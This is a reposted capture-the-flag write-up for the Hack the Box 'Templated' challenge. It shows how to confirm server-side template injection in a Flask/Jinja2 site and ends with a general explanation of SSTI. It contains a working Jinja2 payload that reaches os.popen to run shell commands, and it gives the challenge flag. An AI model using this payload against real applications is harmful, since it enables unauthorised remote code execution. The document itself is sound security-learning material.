Hack the Box——Templated (ssti) wp

Others 2021-01-24 07:51:54 views: null

0x00 preface

I just finished the first question, and immediately opened the second question

Tip: Can you exploit this simple mistake? (Can you exploit this simple mistake?)

 

0x01 visit website

http://178.128.40.217:31440/

Proudly powered by Flask/Jinja2 is prompted from the interface, first blindly guess the ssti vulnerability

First find the injection point based on past experience

0x02 injection point

url try payload

?={
   
   {3*3}}

 

From here, it is clear that it is an ssti vulnerability, and it is also an injection point

0x03 exploit

Here you can use the magic method of python, first by __class__obtaining the class of the object, and then __mro__obtaining the class inherited by the object, because all objects are inherited from object, so that you can get the object class, and then __subclasses__get the subclass of object , In <class 'warnings.catch_warnings'>the namespace of the subclass, __builtins__and finally use the __import__method to import the oslibrary to execute any command. The final payload is as follows.

{
   
   { "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read() }}

flag:HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}

0x04 summary

ssti generation principle

After the server receives the malicious input from the user, it is used as part of the web application template content without any processing. The template engine executes the statement inserted by the user that can destroy the template during the target compilation and rendering process, which may cause Problems such as sensitive information leakage, code execution, GetShell, etc.; simple string splicing does not bring about injection problems. The key depends on what you spliced. If it is a control statement, it will cause confusion between the data field and the code field. Will go out

ssti attack ideas

We know that SSTI can cause many harms, including sensitive information leakage, RCE, GetShell, etc. The key is how to use this injection point to execute the code we want to execute, so the scope of our search for exploit points is actually in the four above us. One is the syntax, built-in variables, attributes, and functions supported by the template itself, and the global variables, attributes, and functions of the pure framework. Then we consider the characteristics of the language itself, such as the object-oriented introspection mechanism, the last We only think about how to find some things defined by the application when we can’t do anything, because this is hardly documented and designed by the developer. Generally, we need to get the source code of the application to consider it.

 

 

Guess you like

Origin blog.csdn.net/yutao598/article/details/112985466
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com